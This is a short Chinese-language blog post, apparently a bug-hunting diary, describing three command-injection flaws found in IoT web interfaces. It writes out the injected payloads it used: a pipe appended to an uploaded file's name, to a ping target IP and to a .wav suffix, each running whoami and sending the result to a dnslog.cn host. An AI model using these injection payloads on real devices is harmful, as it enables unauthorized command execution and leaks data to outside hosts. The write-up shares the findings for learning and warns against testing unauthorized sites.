此文库主要是记录一年来一些有趣的漏洞，拿出来给大家分享一下，仅供学习参考，禁止对任何未授权的网站进行实操。此系列会持续更新~~~也欢迎大家投稿！！1.命令执行不说废话直接上图，这是一个iot的站所以有些功能点就很奇怪的。

修改filename里面的内容:111.wav|ping `whoami`.v5hy64.dnslog.cn

神奇吧，为什么我会想到在filename拼接语句呢因为平时在上传点的filename也是有概率存在rce的，所以我就试了试

凑字数凑字数凑字数凑字数凑字数凑字数凑凑字数凑字数字数2.命令执行还是iot的站看到ping的字眼就要注意了，这个包很明显就是在ping 192.168.5.1这个包，把192.168.5.1改成192.168.5.1|curl `whoami`.vi50t3.dnslog.cn 看看会怎么样3.(惊掉你眼睛的)命令执行同样还是iot的站，跟上面是同一个站点这是试听的原始包。但是他的返回包是这样的于是在wav后缀后面加上|ping `whoami`.ykjxel.dnslog.cn神奇吧！！！！！！！！！！